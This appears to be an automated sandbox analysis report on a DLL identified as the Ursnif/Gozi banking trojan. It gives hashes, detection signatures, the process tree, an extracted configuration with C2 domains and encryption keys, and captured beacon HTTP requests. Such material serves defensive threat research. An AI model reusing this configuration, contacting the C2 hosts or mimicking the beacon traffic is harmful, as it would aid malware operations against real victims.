
Windows Analysis Report 6yDD19jMIu.dll

Overview

General Information

Sample Name: 6yDD19jMIu.dll
Analysis ID: 500309
MD5: 903cf677ba834a968b42bd71e4626a9d
SHA1: c751f3ab4612917d15967fc1f0591e674c2e56ca
SHA256: b601a3c9c3a3df9043ea82733f1da5b413207d7585ca6b18baa8a4d923ce92d8
Tags: BRT, dll, geo, Gozi, ISFB, ITA, Ursnif

Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3708 cmdline: loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6044 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5172 cmdline: rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6048 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 476 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 892 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4680 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 984 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 636 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 3056 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 2100 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 872 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(5 of 28 entries shown)

Unpacked PEs

Source | Rule | Description | Author
0.2.loaddll32.exe.6ece0000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
4.3.rundll32.exe.342a31a.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
0.3.loaddll32.exe.71a31a.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
0.2.loaddll32.exe.750000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.2.rundll32.exe.12b0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(5 of 13 entries shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, Malware Configuration Extractor: Ursnif {"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Multi AV Scanner detection for submitted file
Source: 6yDD19jMIu.dll, Virustotal: Detection: 9%
Multi AV Scanner detection for domain / URL
Source: areuranel.website, Virustotal: Detection: 6%
Source: breuranel.website, Virustotal: Detection: 6%
Source: 6yDD19jMIu.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown, HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.5:49765 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 52.98.152.242:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 52.97.137.242:443 -> 192.168.2.5:49787 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 52.98.208.66:443 -> 192.168.2.5:49789 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.5:49790 version: TLS 1.2
Source: 6yDD19jMIu.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.480895631.00000000036B4000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.482429181.0000000004AE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.500262352.0000000004CE3000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdbQ source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000013.00000003.499906922.0000000004E52000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516748528.00000000050B1000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.504088333.0000000000CFC000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000013.00000003.499906922.0000000004E52000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516748528.00000000050B1000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdbE source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.481849190.00000000036BA000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.503709261.0000000000D08000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbI source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000012.00000003.482428909.00000000036AE000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.504088333.0000000000CFC000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdbC source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.645023107.000000006ED5B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645833298.000000006ED5B000.00000002.00020000.sdmp, 6yDD19jMIu.dll
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbw source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000012.00000003.481849190.00000000036BA000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.503709261.0000000000D08000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb_ source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000012.00000003.480895631.00000000036B4000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.501149079.0000000000D02000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 52.98.208.66 187
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: www.msn.com
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: areuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 40.97.161.50 187
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 40.101.9.178 187
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: breuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: msn.com
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 13.82.28.61 187
Source: Joe Sandbox View, ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View, JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View, IP Address: 40.97.161.50 40.97.161.50
Source: global traffic, HTTP traffic detected:
  GET /mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMgvZ_2/B7axPbB70w/pddJMbRWIrbrOmIG5/zCZ5Ye6AaaIK/UQVqKS3a0Xc/NIt9Fj3Ntaxoz6/O7VgyMdHSYlq2/ziEYeDY9/K.jre HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: msn.com
Source: global traffic, HTTP traffic detected:
  GET /mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0CX9Wer/Pdr_2B7wmmBlB9z54/C5o_2FVpVxdX/zwUkSFPzqLE/G68Q5qKTPDw9R0/3k18HoGgP18MPojxTL8vR/X_2F9xUEGn4YQSaZ/MXqGe2rtZBd9NJapOc3QD/8.jre HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: msn.com
Source: global traffic, HTTP traffic detected:
  GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: outlook.com
Source: global traffic, HTTP traffic detected:
  GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: www.outlook.com
Source: global traffic, HTTP traffic detected:
  GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: outlook.office365.com
Source: global traffic, HTTP traffic detected:
  GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: outlook.com
Source: global traffic, HTTP traffic detected:
  GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: www.outlook.com
Source: global traffic, HTTP traffic detected:
  GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: outlook.office365.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
